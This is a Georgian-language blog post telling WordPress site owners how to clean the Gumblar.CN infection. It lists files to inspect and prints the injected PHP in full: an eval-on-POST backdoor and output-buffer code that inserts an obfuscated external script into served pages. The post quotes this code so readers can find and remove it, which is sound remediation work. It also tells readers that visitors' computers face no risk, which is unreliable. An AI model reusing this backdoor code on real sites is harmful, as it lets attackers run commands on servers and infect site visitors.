კულტურა

Gumblar.CN ვირუსი/ტროიანი

computer virus protection

პირველ რიგში მინდა დაგამშვიდოთ და გითხრათ, რომ თქვენს კომპიუტერს არანაირი პრობლემა არ შეექმნება/შექმნია, მიუხედავად იმისა გქონდათ თუ არა ანტივირუსი! ეს ვირუსი არის პატარა სკრიპტი საიტზე, რომელსაც არაფრის დაშავება არ შეუძლია. 

გუშინ საღამოსკენ სამწუხაროდ ჩვენს საიტზეც აღმოჩნდა მოკალათებული ეს ვირუსი, რომელზეც სასტიკად გაჰყვიროდა ჩემი კასპერსკი. 20 წუთისწინ მოვიძიე ძალიან ბევრი ინფორმაცია ამ ვირუსზე და ვიპოვე მისი გადაწყვეტის გზა.

ვისაც გაქვთ ვორდპრესის (WordPress) ძრავაზე საიტი, დაგიწერთ ეხლა მცირე ტუტორიალს, თუ როგორ უნდა გაწმინდოთ თქვენი .php ფაილები ამ აბეზარი ვირუსისგან/ტროიანისგან.

სხვა ძრავებზე მომუშავე საიტებს/ფორუმებს მოგიწევთ ხელით ყველა .php/.js/.html/.htm (ა.შ.) ფაილის შემოწმება ამ სკრიპტებზე/კოდებზე :)

1. სათითაოდ გადაამოწმეთ ფტპ-ზე არსებული ეს ფაილები

index.php
readme.html
wp-config-sample.php
wp-content/index.php
wp-includes/functions.php
wp-includes/functions.wp-scripts.php
wp-includes/functions.wp-styles.php
wp-includes/js/autosave.js
wp-includes/js/colorpicker.js
wp-includes/js/comment-reply.js
wp-includes/js/hoverIntent.js
wp-includes/js/prototype.js
wp-includes/js/quicktags.js
wp-includes/js/tw-sack.js
wp-includes/js/wp-ajax-response.js
wp-includes/js/wp-lists.js
wp-includes/query.php
wp-includes/registration-functions.php
wp-includes/rss-functions.php
wp-includes/wp-db.php

2. იპოვეთ ამ ფაილებში ეს სკრიპტი და წაშალეთ (ძირითადად შეგხვდებათ ტექსტის თავში)

<?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST[‘tmp_lkojfghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(‘TMP_XHGFJOKL’))define(‘TMP_XHGFJOKL’,base64_decode(‘PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdoaW8lM0NzY3JKa VppSmlacHQlMjBzckppWmNoaW8lM0QlMkYlMkY5Wm40JTJFTDQyZ1pFNGhpbzdoaW8lMkVIUzIlMkVIUzE5NSUyRmpMNHFIU3VlWm5yeSUyRWpIU3NnWkUlM0UlM0MlMkZMNHNjaGlvcmlwTDR0JTNFJykucmVwb GFjZSgvZ1pFfEhTfFpufEw0fEppWnxwYnxoaW8vZywiIikpOwogLS0+PC9zY3JpcHQ+’));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all(‘#<script(.*?)</script>#is’,$s,$a))foreach($a[0] as $v)if(count(explode(“\n”,$v))>5){$e=preg_match(‘#[\'”][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_match(‘#[\(\[](\s*\d+,){20,}#’,$v);if((preg_match(‘#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}$s1=preg_rep lace(‘#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS[‘tmp_xhgfjokl’])call_user_func($GLOBALS[‘tmp_xhgfjokl’],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[‘name’])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2’)$GLOBALS[‘tmp_xhgfjokl’]=$a;tmp_lkojfghx2(); ?>

3. იპოვეთ ამ ფაილებში ეს სკრიპტი და წაშალეთ (ძირითადად შეგხვდებათ ტექსტის ბოლოში)

<script language=javascript><!–
document.write(unescape(”).replace(,””));
–></script>

4. შეცვალეთ პაროლი ფტპ ექაუნთზე!

BakoLine

In the end, it's not going to matter how many breaths you took, but how many moments took your breath away...

მსგავსი ამბები

იხილეთ ასევე
Close
Back to top button